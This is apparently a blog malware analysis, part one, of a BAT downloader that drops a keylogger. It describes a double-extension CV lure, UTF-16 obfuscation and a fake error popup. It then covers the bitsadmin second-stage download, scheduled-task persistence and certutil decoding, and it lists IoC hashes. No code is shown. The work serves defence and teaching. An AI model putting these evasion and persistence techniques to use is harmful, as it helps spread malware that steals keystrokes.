BAT Downloader to Keylogger Technical Analysis — Part 1
Recently I’ve encountered an interesting piece of malware, that used multiple techniques to obfuscate and drop files to disk. I thought it would be interesting to do a quick write-up / analysis on the sample and discuss some of the techniques used.
I’ll be splitting this analysis into two parts, this first one we’ll discuss the initial attack vector and how the malware installs and obfuscate itself into the machine. The second will focus on the two PowerShell scripts that the malware drops in its second stage.
Here are the hashes of the sample for anyone interested in taking a look:
Currently the sample has only 8/60 detection in VT
The malware was being distributed via a Dropbox link. Once downloaded we get a zip file named “CV_YASMINA.PDF .ZIP”.
The zip file uses a double extension to trick user into thinking it’s a PDF. This is a common technique for windows malware as the option to show file extensions is disabled by default.
The zip file contained one file with the “.bat” extension. Again the bat file used the double extension technique to trick users into thinking it’s a PDF file.
Let’s extract the bat file and take a look at the code inside.
As you can see the file seems to be obfuscated in some form and everything is written in what seems to be Chinese. But if we take a look at the encoding of the file with a command line tool like “file” we’ll see that its encoded in “UTF-16 LE”.
In VSCode for example we can choose the option to reopen the file with a different encoding. We’ll choose “UTF-8” and voila. The content of the malicious bat file is now readable.
Let’s start our analysis.
“CV_YASMINA.PDF .BAT” Analysis
The bat file is doing a couple of things to trick the user and download its next stage. Let’s go through the techniques used.
First the malware invokes the “Shows Desktop.lnk” file, which is used to minimize all windows and show the desktop. It’s the same as pressing the “Ctrl+M” keyboard shortcut.
It then invokes the “mshta” utility to pop an error message written in French that translates to “Unable to read the file. The file type may not be supported, the file extension is incorrect, or the file may be corrupted.” To trick the user into thinking that something has failed. (Below is the error message).
Next is the second stage downloader section. The file checks if the machine don’t contain a “test.bat” instance in the %temp% directory. If it doesn’t, it proceeds to create multiple variables from the letter “a” to “j”, each holding a small part of the full command that’ll download the second stage. All of this is used to avoid detection.
If we concatenate all of these variables, we’ll get the following string.
The code above performs the following action:
- Create a folder named “WindowsNT” in the %temp% directory.
- Start a download with the “bitsadmin” utility and download two files. The first is “launcher_kl.txt” which will get saved as “cert.exe” in the previously created directory “WindowsNT” and the second is “kl_exe.txt” which will get saved as “certificate_kl.txt” also in the “WindowsNT” directory.
- Execute the freshly downloaded “cert.exe”.
- Create a schedule task with the name “Update Manager” that’ll get executed every 10 minutes and will launch the “cert.exe” file.
All of this will be pushed to a file named “test.bat” that’ll get dropped in the %temp% directory and executed.
And just to make sure that the second stage downloader will get executed no matter what. A schedule task with the name “Update Manager” will be created to execute the “test.bat” file every 10 minutes.
Assuming that everything went as planned, and malware successfully downloaded everything. The next thing that’ll get executed is the freshly downloaded “cert.exe”. And that’s the file that we’ll be looking at next.
First we look at the result of the file command on our executable, we’ll see that it’s a PE32 executable with a GUI and the symbols are stripped.
Next, let’s check if it contains any interesting strings, by executing the “strings” command on it.
BINGO. As you can see the strings contains what look like a WMI command and some PowerShell. Let’s beautify this and put it into a nice editor and start analyzing.
In a nutshell the following code is decoding the previously downloaded “certificate_kl.txt” stored in the temp directory within the “WindowsNT” folder, using the “certutil” utility with “-decode” flag. Which is used to decode a base64-encoded file.
The decoded file is of type “Microsoft Cabinet archive data” or “CAB” file fort short (I.E: Compressed). The next thing the malware does is the decompression routine, which consist of using the “EXPAND” command.
The newly obtained PowerShell file is the final stage (Or so I thought) that contains a “Keylogger” written in C#. (That I’ll be analyzing in Part 2).
The final step before executing the PowerShell script is obfuscation. The malware author created a quick obfuscation routine to change the name of some of the functions inside the script. It uses simple replace methods and some randomization, to replace each function with a set of random characters.
Finally, the script gets executed and the original encoded file “certificate_kl.txt” is deleted.
Before we conclude this first part of our analysis, let’s do a quick recap on what the malware did and what techniques were used.
- The malware hides itself as a PDF file inside a ZIP file with the name “CV_YASMINA” to trick the users into thinking that it’s an example of a CV (Curriculum Vita).
- The ZIP file contains a malicious bat file that obfuscate its contents by using the UTF-16 LE encoding and multiple variables names to separate the commands being executed.
- When executed its shows an error message to trick the users into thinking that something went wrong.
- It downloads two files (“cert.exe” and certificate_kl.txt”) into the temp directory. Notice that the original files on the dropbox are with a “.txt” extension which add a small layer of obfuscation as “txt” file are sometimes ignored during analysis of logs.
- It creates a two schedule tasks to make sure that the second stage will get downloaded and executed no matter what.
- Once the second stage gets downloaded. The malware proceeds into the execution of “cert.exe” which will decode and create the “final” payload
Indicator of Compromise (IoCs)
CV_YASMINA.PDF .zip: dd03221a35480c483c86195956ebb5d094c3e875c5f18f2d6e95a7dc32db78a9CV_YASMINA.PDF .bat: dd42edae0008019aac47cee7962f564f1c201a232fe62f269b485e8e6332e498launcher_kl.txt / cert.exe: cf7fc1e176f3931bfbb508ddeb1b24b79f3db166ff1739cff69bee4d7f5d5a6akl_exe.txt / certificate_kl.txt:
1dd960fad2a8d057d32a9889e1f6a7c1349697d7df0fee2bc08d39709c443bd4windows_activator.ps1 (After Obfuscation):
I hope you enjoyed this quick analysis and learned something along the way. See you in part 2, hopefully very soon.
If you have any feedback or suggestions, please send them my way @nas_bench